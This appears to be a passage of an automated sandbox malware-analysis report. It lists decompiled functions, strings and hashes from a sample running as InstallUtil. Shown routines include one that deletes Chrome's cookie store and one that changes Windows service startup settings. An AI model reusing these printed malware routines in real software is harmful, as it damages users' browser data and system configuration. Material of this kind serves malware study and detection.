DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040A171
GetLastError.KERNEL32 ref: 0040A17B

Strings

[Chrome Cookies found, cleared!], xrefs: 0040A1A1
[Chrome Cookies not found], xrefs: 0040A195
UserProfile, xrefs: 0040A141
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A13C

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: e608f3ab0a2893a21307e1549365164004f70cd7f67394e48dcbd4e608d21d34
Instruction ID: b15e823080d4bc2bf0f2b47e97ad8a06341ae1548828daf060ed6f6c7c3f7e53
Opcode Fuzzy Hash: e608f3ab0a2893a21307e1549365164004f70cd7f67394e48dcbd4e608d21d34
Instruction Fuzzy Hash: 3B01F271A442056BCB04BB76DC1B8BE7724A922748F58027FF4027A1E2FD79481686CF

Uniqueness

Uniqueness Score: -1.00%

Function 0043F419 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0043F3CA,00000000,?,0043F36A,00000000,004691D8,0000000C,0043F4C1,00000000,00000002), ref: 0043F439
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0043F44C
FreeLibrary.KERNEL32(00000000,?,?,?,0043F3CA,00000000,?,0043F36A,00000000,004691D8,0000000C,0043F4C1,00000000,00000002), ref: 0043F46F

Strings

<@, xrefs: 0043F45D
mscoree.dll, xrefs: 0043F432
CorExitProcess, xrefs: 0043F444

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: <@$CorExitProcess$mscoree.dll
API String ID: 4061214504-3160931098
Opcode ID: c7c3b52585d8abc81870ef7c7e7cb90fe1270fa6735809de8167db2ea3ee4d06
Instruction ID: 0065de99dbaa4e5e538e5e9a5c63d0a393c0099867ddae68623e82f655967173
Opcode Fuzzy Hash: c7c3b52585d8abc81870ef7c7e7cb90fe1270fa6735809de8167db2ea3ee4d06
Instruction Fuzzy Hash: 64F0CD31A00308FBCB105F54DC09B9EBFB4EF44716F104079F805A6151DF348E84CA58

Uniqueness

Uniqueness Score: -1.00%

Function 0043741C Relevance: 9.3, APIs: 6, Instructions: 284
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0043741C(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
				intOrPtr _v0;
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __esi;
				void* __ebp;
				signed int _t61;
				void* _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t73;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t81;
				void* _t82;
				signed int _t84;
				void* _t85;
				signed int _t87;
				signed int _t93;
				signed int _t102;
				void* _t104;
				signed int _t107;
				signed int* _t110;
				signed int* _t111;
				intOrPtr* _t113;
				signed int _t118;
				signed int _t120;
				signed int _t123;
				void* _t125;
				signed int _t128;
				signed int _t131;
				signed int _t139;
				signed int _t145;
				void _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				signed int _t153;
				signed int _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;

				_t139 = __edx;
				_t155 = _a4;
				if(_t155 == 0) {
					_t113 = E00439941();
					_t159 = 0x16;
					 *_t113 = _t159;
					E0043862C();
					return _t159;
				}
				_push(__edi);
				_t123 = 9;
				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
				_t145 = _a8;
				__eflags = _t145;
				if(_t145 == 0) {
					_t111 = E00439941();
					_t158 = 0x16;
					 *_t111 = _t158;
					E0043862C();
					_t78 = _t158;
					L12:
					return _t78;
				}
				_push(__ebx);
				__eflags =  *(_t145 + 4);
				if(__eflags <= 0) {
					if(__eflags < 0) {
						L10:
						_t110 = E00439941();
						_t157 = 0x16;
						 *_t110 = _t157;
						_t78 = _t157;
						L11:
						goto L12;
					}
					__eflags =  *_t145;
					if( *_t145 < 0) {
						goto L10;
					}
				}
				_t64 = 7;
				__eflags =  *(_t145 + 4) - _t64;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						goto L10;
					}
					__eflags =  *_t145 - 0x93406fff;
					if(__eflags > 0) {
						goto L10;
					}
				}
				E004455E0(0, _t145, _t155, __eflags);
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t67 = E00444E15( &_v12);
				_pop(_t125);
				__eflags = _t67;
				if(_t67 == 0) {
					_t75 = E00444E41( &_v16);
					_pop(_t125);
					__eflags = _t75;
					if(_t75 == 0) {
						_t77 = E00444E6D( &_v8);
						_pop(_t125);
						__eflags = _t77;
						if(_t77 == 0) {
							_t118 =  *(_t145 + 4);
							_t128 =  *_t145;
							__eflags = _t118;
							if(__eflags < 0) {
								L28:
								_push(_t145);
								_push(_t155);
								_t78 = E0043EB17();
								__eflags = _t78;
								if(_t78 != 0) {
									goto L11;
								}
								__eflags = _v12;
								asm("cdq");
								_t147 =  *_t155;
								_t120 = _t139;
								if(__eflags == 0) {
									L32:
									_t80 = _v8;
									L33:
									asm("cdq");
									_t148 = _t147 - _t80;
									asm("sbb ebx, edx");
									_t81 = E00453360(_t148, _t120, 0x3c, 0);
									 *_t155 = _t81;
									__eflags = _t81;
									if(_t81 < 0) {
										_t148 = _t148 + 0xffffffc4;
										 *_t155 = _t81 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t82 = E004532B0(_t148, _t120, 0x3c, 0);
									_t121 = _t139;
									_t28 = _t155 + 4; // 0x848d0046
									asm("cdq");
									_t150 = _t82 +  *_t28;
									asm("adc ebx, edx");
									_t84 = E00453360(_t150, _t139, 0x3c, 0);
									 *(_t155 + 4) = _t84;
									__eflags = _t84;
									if(_t84 < 0) {
										_t150 = _t150 + 0xffffffc4;
										 *(_t155 + 4) = _t84 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t85 = E004532B0(_t150, _t121, 0x3c, 0);
									_t122 = _t139;
									_t31 = _t155 + 8; // 0xa824
									asm("cdq");
									_t152 = _t85 +  *_t31;
									asm("adc ebx, edx");
									_t87 = E00453360(_t152, _t139, 0x18, 0);
									 *(_t155 + 8) = _t87;
									__eflags = _t87;
									if(_t87 < 0) {
										_t152 = _t152 + 0xffffffe8;
										 *(_t155 + 8) = _t87 + 0x18;
										asm("adc ebx, 0xffffffff");
									}
									_t131 = E004532B0(_t152, _t122, 0x18, 0);
									__eflags = _t139;
									if(__eflags < 0) {
										L48:
										_t44 = _t155 + 0x18; // 0xa024848d
										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
										asm("cdq");
										_t153 = 7;
										_t51 = _t155 + 0xc; // 0x50506a00
										_t93 =  *_t51;
										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
										__eflags = _t93;
										if(_t93 > 0) {
											goto L43;
										}
										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
										 *(_t155 + 0xc) = _t93 + 0x1f;
										_t55 = _t131 + 0x16d; // 0x16d
										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
										goto L44;
									} else {
										if(__eflags > 0) {
											L42:
											_t34 = _t155 + 0x18; // 0xa024848d
											asm("cdq");
											_t154 = 7;
											_t39 = _t155 + 0xc;
											 *_t39 =  *(_t155 + 0xc) + _t131;
											__eflags =  *_t39;
											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
											L43:
											_t42 = _t155 + 0x1c;
											 *_t42 =  *(_t155 + 0x1c) + _t131;
											__eflags =  *_t42;
											L44:
											_t78 = 0;
											goto L11;
										}
										__eflags = _t131;
										if(_t131 == 0) {
											__eflags = _t139;
											if(__eflags > 0) {
												goto L44;
											}
											if(__eflags < 0) {
												goto L48;
											}
											__eflags = _t131;
											if(_t131 >= 0) {
												goto L44;
											}
											goto L48;
										}
										goto L42;
									}
								}
								_push(_t155);
								_t102 = E00445631(_t120, _t147, _t155, __eflags);
								__eflags = _t102;
								if(_t102 == 0) {
									goto L32;
								}
								_t80 = _v8 + _v16;
								 *((intOrPtr*)(_t155 + 0x20)) = 1;
								goto L33;
							}
							if(__eflags > 0) {
								L20:
								_t104 = 7;
								__eflags = _t118 - _t104;
								if(__eflags > 0) {
									goto L28;
								}
								if(__eflags < 0) {
									L23:
									asm("cdq");
									_push( &_v24);
									asm("sbb ebx, edx");
									_v24 = _t128 - _v8;
									_push(_t155);
									_v20 = _t118;
									_t78 = E0043EB17();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									__eflags = _v12 - _t78;
									if(__eflags == 0) {
										goto L44;
									}
									_push(_t155);
									_t107 = E00445631(_t118, _t145, _t155, __eflags);
									__eflags = _t107;
									if(_t107 == 0) {
										goto L44;
									}
									asm("cdq");
									_v24 = _v24 - _v16;
									_push( &_v24);
									asm("sbb [ebp-0x10], edx");
									_push(_t155);
									_t78 = E0043EB17();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									 *((intOrPtr*)(_t155 + 0x20)) = 1;
									goto L44;
								}
								__eflags = _t128 - 0x933c7b7f;
								if(_t128 >= 0x933c7b7f) {
									goto L28;
								}
								goto L23;
							}
							__eflags = _t128 - 0x3f480;
							if(_t128 <= 0x3f480) {
								goto L28;
							}
							goto L20;
						}
					}
				}
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E00438659();
				asm("int3");
				_push(_t155);
				_t69 = E0043EAB2(_t125);
				_t156 = _t69;
				__eflags = _t156;
				if(_t156 != 0) {
					_push(_v0);
					_t70 = E0043741C(0, _t139, _t145, _t156);
					asm("sbb eax, eax");
					_t73 =  !( ~_t70) & _t156;
					__eflags = _t73;
					return _t73;
				}
				return _t69;
			}

0x0043741c
0x00437425
0x0043742a
0x0043742c
0x00437433
0x00437434
0x00437436
0x00000000
0x0043743b
0x0043743f
0x00437447
0x00437448
0x0043744a
0x0043744d
0x0043744f
0x00437451
0x00437458
0x00437459
0x0043745b
0x00437460
0x00437491
0x00000000
0x00437491
0x00437464
0x00437467
0x0043746a
0x0043746c
0x00437484
0x00437484
0x0043748b
0x0043748c
0x0043748e
0x00437490
0x00000000
0x00437490
0x0043746e
0x00437470
0x00000000
0x00000000
0x00437470
0x00437474
0x00437475
0x00437478
0x0043747a
0x00000000
0x00000000
0x0043747c
0x00437482
0x00000000
0x00000000
0x00437482
0x00437497
0x0043749f
0x004374a3
0x004374a6
0x004374a9
0x004374ae
0x004374af
0x004374b1
0x004374bb
0x004374c0
0x004374c1
0x004374c3
0x004374cd
0x004374d2
0x004374d3
0x004374d5
0x004374db
0x004374de
0x004374e0
0x004374e2
0x00437563
0x00437563
0x00437564
0x00437565
0x0043756c
0x0043756e
0x00000000
0x00000000
0x00437574
0x0043757a
0x0043757b
0x0043757d
0x0043757f
0x0043759b
0x0043759b
0x0043759e
0x0043759e
0x0043759f
0x004375a5
0x004375a9
0x004375ae
0x004375b0
0x004375b2
0x004375b7
0x004375ba
0x004375bc
0x004375bc
0x004375c5
0x004375cc
0x004375ce
0x004375d1
0x004375d2
0x004375d8
0x004375dc
0x004375e1
0x004375e4
0x004375e6
0x004375eb
0x004375ee
0x004375f1
0x004375f1
0x004375fa
0x00437601
0x00437603
0x00437606
0x00437607
0x0043760d
0x00437611
0x00437616
0x00437619
0x0043761b
0x00437620
0x00437623
0x00437626
0x00437626
0x00437634
0x00437636
0x00437638
0x00437665
0x00437665
0x0043766b
0x00437672
0x00437673
0x00437676
0x00437676
0x00437679
0x0043767c
0x0043767e
0x00000000
0x00000000
0x00437683
0x0043768a
0x0043768d
0x00437693
0x00437696
0x00000000
0x0043763a
0x0043763a
0x00437640
0x00437640
0x00437647
0x00437648
0x0043764b
0x0043764b
0x0043764b
0x0043764e
0x00437651
0x00437651
0x00437651
0x00437651
0x00437654
0x00437654
0x00000000
0x00437654
0x0043763c
0x0043763e
0x0043765b
0x0043765d
0x00000000
0x00000000
0x0043765f
0x00000000
0x00000000
0x00437661
0x00437663
0x00000000
0x00000000
0x00000000
0x00437663
0x00000000
0x0043763e
0x00437638
0x00437581
0x00437582
0x00437588
0x0043758a
0x00000000
0x00000000
0x0043758f
0x00437592
0x00000000
0x00437592
0x004374e4
0x004374ee
0x004374f0
0x004374f1
0x004374f3
0x00000000
0x00000000
0x004374f5
0x004374ff
0x00437502
0x00437508
0x00437509
0x0043750b
0x0043750e
0x0043750f
0x00437512
0x00437519
0x0043751b
0x00000000
0x00000000
0x00437521
0x00437524
0x00000000
0x00000000
0x0043752a
0x0043752b
0x00437531
0x00437533
0x00000000
0x00000000
0x0043753c
0x0043753d
0x00437543
0x00437544
0x00437547
0x00437548
0x0043754f
0x00437551
0x00000000
0x00000000
0x00437557
0x00000000
0x00437557
0x004374f7
0x004374fd
0x00000000
0x00000000
0x00000000
0x004374fd
0x004374e6
0x004374ec
0x00000000
0x00000000
0x00000000
0x004374ec
0x004374d5
0x004374c3
0x0043769b
0x0043769c
0x0043769d
0x0043769e
0x0043769f
0x004376a0
0x004376a5
0x004376ab
0x004376ac
0x004376b1
0x004376b3
0x004376b5
0x004376b7
0x004376bb
0x004376c3
0x004376c8
0x004376c8
0x00000000
0x004376c8
0x004376cc

APIs

__allrem.LIBCMT ref: 004375A9
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004375C5
__allrem.LIBCMT ref: 004375DC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004375FA
__allrem.LIBCMT ref: 00437611
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043762F

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f3342e1a3d51c19cfa4325d5d04a5a1bc8e815df67230c373c4fd9eaec09afd2
Instruction ID: 392012ef54fba666c7a04b8df7cec2ce0ca1ac78152d597fc0bfc278a376c8f6
Opcode Fuzzy Hash: f3342e1a3d51c19cfa4325d5d04a5a1bc8e815df67230c373c4fd9eaec09afd2
Instruction Fuzzy Hash: 4B814CB1604B05ABE7349E6DCC82B5B77A8AF59334F20512FF451D7782E778E9008748

Uniqueness

Uniqueness Score: -1.00%

Function 004419B9 Relevance: 9.2, APIs: 6, Instructions: 200
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 80%

			E004419B9(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				void* __ecx;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				intOrPtr _t76;
				signed int _t79;
				signed int _t86;
				intOrPtr _t88;
				signed int _t99;
				void* _t101;
				void* _t103;
				void* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				signed int _t123;
				signed int _t125;
				intOrPtr _t126;
				signed int _t128;
				intOrPtr _t130;
				signed int _t131;
				void* _t135;
				void* _t136;
				void* _t138;

				_t120 = __edx;
				_t97 = __ebx;
				_push(_t101);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t123 = 0;
					_t67 = E0043A251( &_v8, 0, 0, _a8, 0x7fffffff);
					_t136 = _t135 + 0x14;
					__eflags = _t67;
					if(_t67 == 0) {
						L5:
						_t128 = E00441BB3(_t101, _v8, 2);
						_pop(_t103);
						__eflags = _t128;
						if(_t128 == 0) {
							L11:
							E004427C2(_t128);
							_t70 = _t123;
							goto L12;
						} else {
							_t71 = E0043A251(_t123, _t128, _v8, _a8, 0xffffffff);
							_t136 = _t136 + 0x14;
							__eflags = _t71;
							if(_t71 == 0) {
								_t123 = E00440D3B(_t97, _t103, _t120, _a4, _t128);
								goto L11;
							} else {
								__eflags = _t71 - 0x16;
								if(_t71 == 0x16) {
									goto L13;
								} else {
									__eflags = _t71 - 0x22;
									if(_t71 != 0x22) {
										goto L11;
									} else {
										goto L13;
									}
								}
							}
						}
					} else {
						__eflags = _t67 - 0x16;
						if(_t67 == 0x16) {
							L13:
							_push(_t123);
							_push(_t123);
							_push(_t123);
							_push(_t123);
							E00438659();
							asm("int3");
							E00431740(0x4692c0, 0x1c);
							_t130 = _a4;
							_t75 = E004419B9(_t97, _t120, _t123, _t130, _t130, _a8);
							_t108 = _t123;
							_t125 = _t75;
							__eflags = _t125;
							if(_t125 != 0) {
								_t76 = E00444255(_t97, _t108, _t120);
								_v40 = _t76;
								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
								_t110 =  *((intOrPtr*)(_t76 + 0x48));
								_v44 =  *((intOrPtr*)(_t76 + 0x48));
								_v32 = 0;
								_t79 = E0043A97B( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
								_t138 = _t136 + 0x18;
								__eflags = _t79;
								if(_t79 == 0) {
									L22:
									_t99 = E004421F7(_t110, _v32 + 4);
									__eflags = _t99;
									if(_t99 == 0) {
										goto L15;
									} else {
										_t20 = _t99 + 4; // 0x4
										_v36 = _t20;
										_t110 =  &_v48;
										_t125 = 0;
										_t86 = E0043A97B( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
										_t138 = _t138 + 0x18;
										__eflags = _t86;
										if(_t86 == 0) {
											L29:
											_t126 = _v48;
											E00441948(4);
											_pop(_t112);
											_v8 = _v8 & 0x00000000;
											_t131 = _t130 + _t130;
											_t113 = _t112 | 0xffffffff;
											__eflags =  *(_t126 + 0x24 + _t131 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E004427C2( *(_t126 + 0x24 + _t131 * 8));
													_pop(_t116);
													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
													_t113 = _t116 | 0xffffffff;
													__eflags = _t113;
												}
											}
											_t88 = _v40;
											__eflags =  *(_t88 + 0x350) & 0x00000002;
											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x46c994 & 0x00000001;
												if(( *0x46c994 & 0x00000001) == 0) {
													__eflags =  *(_t126 + 0x24 + _t131 * 8);
													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t113 == 1;
														if(_t113 == 1) {
															E004427C2( *(_t126 + 0x24 + _t131 * 8));
															_t51 = _t126 + 0x24 + _t131 * 8;
															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
															__eflags =  *_t51;
														}
													}
												}
											}
											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
											 *(_t126 + 0x24 + _t131 * 8) = _t99;
											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E00441BAA();
										} else {
											__eflags = _t86 - 0x16;
											if(_t86 == 0x16) {
												L26:
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												goto L20;
											} else {
												__eflags = _t86 - 0x22;
												if(_t86 != 0x22) {
													__eflags = _t86;
													if(_t86 == 0) {
														goto L29;
													} else {
														E004427C2(_t99);
														goto L15;
													}
												} else {
													goto L26;
												}
											}
										}
									}
								} else {
									__eflags = _t79 - 0x16;
									if(_t79 == 0x16) {
										L19:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L20:
										_t79 = E00438659();
									} else {
										__eflags = _t79 - 0x22;
										if(_t79 == 0x22) {
											goto L19;
										}
									}
									__eflags = _t79;
									if(_t79 != 0) {
										goto L15;
									} else {
										goto L22;
									}
								}
							} else {
								L15:
							}
							return E00431786();
						} else {
							__eflags = _t67 - 0x22;
							if(_t67 == 0x22) {
								goto L13;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t70 = E00440D3B(__ebx, _t101, __edx, _a4, 0);
					L12:
					return _t70;
				}
			}

0x004419b9
0x004419b9
0x004419be
0x004419c3
0x004419d3
0x004419d4
0x004419dd
0x004419e5
0x004419ea
0x004419ed
0x004419ef
0x004419fb
0x00441a05
0x00441a08
0x00441a09
0x00441a0b
0x00441a3c
0x00441a3d
0x00441a43
0x00000000
0x00441a0d
0x00441a17
0x00441a1c
0x00441a1f
0x00441a21
0x00441a3a
0x00000000
0x00441a23
0x00441a23
0x00441a26
0x00000000
0x00441a28
0x00441a28
0x00441a2b
0x00000000
0x00441a2d
0x00000000
0x00441a2d
0x00441a2b
0x00441a26
0x00441a21
0x004419f1
0x004419f1
0x004419f4
0x00441a4b
0x00441a4b
0x00441a4c
0x00441a4d
0x00441a4e
0x00441a50
0x00441a55
0x00441a5d
0x00441a65
0x00441a69
0x00441a6f
0x00441a70
0x00441a72
0x00441a74
0x00441a7d
0x00441a82
0x00441a88
0x00441a8b
0x00441a8e
0x00441a93
0x00441aa2
0x00441aa7
0x00441aaa
0x00441aac
0x00441ac6
0x00441ad3
0x00441ad5
0x00441ad7
0x00000000
0x00441ad9
0x00441ad9
0x00441adc
0x00441adf
0x00441aea
0x00441aed
0x00441af2
0x00441af5
0x00441af7
0x00441b1a
0x00441b1a
0x00441b1f
0x00441b24
0x00441b25
0x00441b29
0x00441b2f
0x00441b32
0x00441b34
0x00441b38
0x00441b3c
0x00441b42
0x00441b47
0x00441b48
0x00441b4d
0x00441b4d
0x00441b4d
0x00441b3c
0x00441b50
0x00441b53
0x00441b5a
0x00441b5c
0x00441b63
0x00441b69
0x00441b6b
0x00441b6d
0x00441b71
0x00441b72
0x00441b78
0x00441b7e
0x00441b7e
0x00441b7e
0x00441b7e
0x00441b72
0x00441b6b
0x00441b63
0x00441b86
0x00441b88
0x00441b8f
0x00441b93
0x00441b9a
0x00441af9
0x00441af9
0x00441afc
0x00441b03
0x00441b03
0x00441b04
0x00441b05
0x00441b06
0x00441b07
0x00000000
0x00441afe
0x00441afe
0x00441b01
0x00441b0a
0x00441b0c
0x00000000
0x00441b0e
0x00441b0f
0x00000000
0x00441b14
0x00000000
0x00000000
0x00000000
0x00441b01
0x00441afc
0x00441af7
0x00441aae
0x00441aae
0x00441ab1
0x00441ab8
0x00441ab8
0x00441ab9
0x00441aba
0x00441abb
0x00441abc
0x00441abd
0x00441abd
0x00441ab3
0x00441ab3
0x00441ab6
0x00000000
0x00000000
0x00441ab6
0x00441ac2
0x00441ac4
0x00000000
0x00000000
0x00000000
0x00000000
0x00441ac4
0x00441a76
0x00441a76
0x00441a76
0x00441ba6
0x004419f6
0x004419f6
0x004419f9
0x00000000
0x00000000
0x00000000
0x00000000
0x004419f9
0x004419f4
0x004419c5
0x004419ca
0x00441a47
0x00441a4a
0x00441a4a

APIs

__cftoe.LIBCMT ref: 004419E5
__cftoe.LIBCMT ref: 00441A17

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: d3e72acf44e3f5a67bf9fe81771ed45315caf7be2404a951975ac2997baac35b
Instruction ID: 7ec08d6e7ec97ea350624d46708061eb4f517761ab4ebaddb3acba4deaa8f158
Opcode Fuzzy Hash: d3e72acf44e3f5a67bf9fe81771ed45315caf7be2404a951975ac2997baac35b
Instruction Fuzzy Hash: 41510E71900205ABFB109B698D41FAF77A9EF48374F14421FF415A22A2EF3DDD80866C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9DC Relevance: 9.1, APIs: 6, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040E9DC(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v24;
				void* __esi;
				intOrPtr _t40;
				void* _t48;
				intOrPtr* _t51;

				E00431C0B( &_v12, 0);
				_t48 =  *0x46fda8;
				_v8 = _t48;
				_t51 = E0040BBB2(_a4, E0040BAE1(0x46d130));
				if(_t51 != 0) {
					L5:
					E00431C63( &_v12);
					return _t51;
				} else {
					if(_t48 == 0) {
						__eflags = E0040BCCC(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							E0040B9AD( &_v24);
							E00435A36( &_v24, 0x46969c);
							asm("int3");
							_t40 =  *((intOrPtr*)( *[fs:0x2c]));
							__eflags =  *0x46fd9c -  *((intOrPtr*)(_t40 + 4));
							if( *0x46fd9c >  *((intOrPtr*)(_t40 + 4))) {
								_push(_t51);
								E00430D17(0x46fd9c);
								__eflags =  *0x46fd9c - 0xffffffff;
								if( *0x46fd9c == 0xffffffff) {
									E0040ED92();
									E004310BE(__eflags, 0x453dc8);
									E00430CD8(0x46fd9c, 0x46fd9c);
								}
							}
							return 0x46fda0;
						} else {
							_t51 = _v8;
							 *0x46fda8 = _t51;
							 *((intOrPtr*)( *_t51 + 4))();
							E00431E1C(__eflags, _t51);
							goto L5;
						}
					} else {
						_t51 = _t48;
						goto L5;
					}
				}
			}

0x0040e9e9
0x0040e9ee
0x0040e9f9
0x0040ea0a
0x0040ea0e
0x0040ea42
0x0040ea45
0x0040ea51
0x0040ea10
0x0040ea12
0x0040ea26
0x0040ea29
0x0040ea55
0x0040ea63
0x0040ea68
0x0040ea6f
0x0040ea76
0x0040ea7c
0x0040ea7e
0x0040ea85
0x0040ea8a
0x0040ea92
0x0040ea94
0x0040ea9e
0x0040eaa4
0x0040eaaa
0x0040eaab
0x0040eab1
0x0040ea2b
0x0040ea2b
0x0040ea30
0x0040ea38
0x0040ea3c
0x00000000
0x0040ea41
0x0040ea14
0x0040ea14
0x00000000
0x0040ea14
0x0040ea12

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040E9E9
int.LIBCPMT ref: 0040E9FC

Part of subcall function 0040BAE1: std::_Lockit::_Lockit.LIBCPMT ref: 0040BAF2
Part of subcall function 0040BAE1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BB0C

std::_Facet_Register.LIBCPMT ref: 0040EA3C
std::_Lockit::~_Lockit.LIBCPMT ref: 0040EA45
__CxxThrowException@8.LIBVCRUNTIME ref: 0040EA63
__Init_thread_footer.LIBCMT ref: 0040EAA4

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
String ID:
API String ID: 3815856325-0
Opcode ID: 3748b76a2d14618ace7edfe6846318b36ac90a81fb565085e0f63014e37dfb8f
Instruction ID: 9c8ff9a50571c923da8d428752ab15b2b4e98a5757246ed7726996d64f402873
Opcode Fuzzy Hash: 3748b76a2d14618ace7edfe6846318b36ac90a81fb565085e0f63014e37dfb8f
Instruction Fuzzy Hash: 6421D3316001149BC714EB59D84299E7778AF48324F20017FF815B72E1EB7CAD058BDD

Uniqueness

Uniqueness Score: -1.00%

Function 004174F6 Relevance: 9.1, APIs: 6, Instructions: 67
serviceCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E004174F6(signed char __ecx, char _a4) {
				signed char _v5;
				void* _t7;
				signed int _t11;
				void* _t17;
				short* _t21;
				signed int _t24;
				int _t25;
				void* _t28;
				void* _t31;

				_push(__ecx);
				_t21 = 0;
				_v5 = __ecx;
				_t7 = OpenSCManagerW(0, 0, 2);
				_t24 =  &_a4;
				_t31 = _t7;
				_t28 = OpenServiceW(_t31, E00401EC4(_t24), 2);
				if(_t28 != 0) {
					_t25 = _t24 | 0xffffffff;
					_t11 = _v5 & 0x000000ff;
					if(_t11 == 0) {
						_push(4);
						goto L8;
					} else {
						_t17 = _t11 - 1;
						if(_t17 == 0) {
							_push(2);
							goto L8;
						} else {
							if(_t17 == 1) {
								_push(3);
								L8:
								_pop(_t25);
							}
						}
					}
					_t21 = _t21 & 0xffffff00 | ChangeServiceConfigW(_t28, 0xffffffff, _t25, 0xffffffff, _t21, _t21, _t21, _t21, _t21, _t21, _t21) != 0x00000000;
					CloseServiceHandle(_t31);
					CloseServiceHandle(_t28);
				} else {
					CloseServiceHandle(_t31);
				}
				E00401EC9();
				return _t21;
			}

0x004174f9
0x004174ff
0x00417501
0x00417506
0x0041750e
0x00417511
0x00417520
0x00417524
0x00417533
0x00417536
0x00417538
0x0041754c
0x00000000
0x0041753a
0x0041753a
0x0041753d
0x00417548
0x00000000
0x0041753f
0x00417542
0x00417544
0x0041754e
0x0041754e
0x0041754e
0x00417542
0x0041753d
0x0041756b
0x0041756e
0x00417571
